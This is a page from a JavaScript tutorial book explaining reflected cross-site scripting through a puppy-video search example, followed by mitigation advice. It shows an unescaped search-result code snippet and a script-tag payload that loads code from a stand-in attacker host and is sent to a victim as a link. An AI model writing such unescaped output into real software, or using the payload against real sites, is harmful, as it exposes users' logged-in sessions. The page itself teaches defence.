Essential Books

Reflected Cross-site scripting XSS

suggest change

Let’s say Joe owns a website that allows you to log on, view puppy videos, and save them to your account.

Whenever a user searches on that website, they are redirected to https://example.com/search?q=brown+puppies.

If a user’s search doesn’t match anything, than they see a message along the lines of:

Your search (brown puppies), didn’t match anything. Try again.

On the backend, that message is displayed like this: 

if(!searchResults){
    webPage += "<div>Your search (<b>" + searchQuery + "</b>), didn't match anything. Try again.";
}

However, when Alice searches for <h1>headings</h1>, she gets this back:

Your search (headings) didn’t match anything. Try again.

Raw HTML: 

Your search (<b><h1>headings</h1></b>) didn't match anything. Try again.

Than Alice searches for <script>alert(1)</script>, she sees:

Your search (), didn’t match anything. Try again.

And:

Than Alice searches for <script src = "https://alice.evil/puppy_xss.js></script>really cute puppies, and copies the link in her address bar, and than emails Bob:

Bob,

When I search for cute puppies, nothing happens!

Than Alice sucessfully gets Bob to run her script while Bob is logged on to his account.

Mitigation:

  1. Escape all angle brackets in searches before returning the search term when no results are found.
  2. Don’t return the search term when no results are found.
  3. Add a Content Security Policy that refuses to load active content from other domains
Found a mistake? Have a question or improvement idea? Let me know.

Feedback about page:

Feedback:
Optional: your email if you want me to get back to you:

Security issues:
* Security issues
* Reflected Cross-site scripting XSS
* Persistent Cross-site scripting XSS
* Persistent Cross-site scripting from JavaScript string literals
* Why scripts from other people can harm your website and its visitors
* Evaled JSON injection
Table Of Contents
0 Getting started
1 Comments
2 Basic data types
3 Built-in constants
4 Variables
5 Declarations and assignments
6 Reserved keywords
7 Data types in JavaScript
8 Strings
9 Escape sequences
10 Template Literals
11 Arrays
12 Objects
13 Prototypes objects
14 Classes
15 Variable coercion / conversion
16 Map
17 Set
18 Arithmetic Math
19 Bitwise operators
20 Bitwise operators
21 Unary Operators
22 Comparison operations
23 Conditions
24 Loops
25 Functions
26 Arrow functions
27 Date
28 Date comparison
29 Scope
30 AJAX
31 Promises
32 Regular Expression
33 Error Handling
34 Geolocation
35 Cookies
36 Intervals and timeouts
37 Generators
38 History of visited urls
39 Strict mode
40 Custom Elements
41 JSON
42 Binary Data
43 Web Storage
44 Fetch
45 Modules
46 Screen
47 Inheritance
48 Timestamps
49 Destructuring assignment
50 Web Worker
51 Debugging
52 Notifications API
53 WebSockets
54 Web Cryptography API
55 Async functions, async / await
56 Constructor functions
57 execCommand and contenteditable
58 Performance Tips
59 Design patterns
60 requestAnimationFrame
61 Method chaining
62 Global error handling in browsers
63 File API, blobs and FileReaders
64 Console
65 Tail call optimization
66 Detecting browser
67 Enumerations
68 Symbols
69 Localization
70 Selection API
71 Callbacks
72 Functional JavaScript
73 Modals
74 Data attributes
75 Event Loop
76 Events
77 Data manipulation
78 BOM Browser Object Model
79 Unit Testing
80 Linters for ensuring code quality
81 Automatic Semicolon Insertion
82 IndexedDB
83 Anti-patterns
84 Navigator Object
85 Modularization techniques
86 Proxy
87 Same origin policy, cross-origin communication
88 postMessage and MessageEvent
89 WeakMap
90 WeakSet
91 Behaviroal Design Patterns
92 Server-sent events
93 Async iterators
94 Namespacing
95 Evaluating JavaScript
96 Memory efficiency
97 How to make iterator usable inside async callback function
98 Context this
99 Setters and getters
100 Vibration API
101 Fluent API
102 Tilde
103 Security issues
104 Get and set CSS custom variables
105 Contributors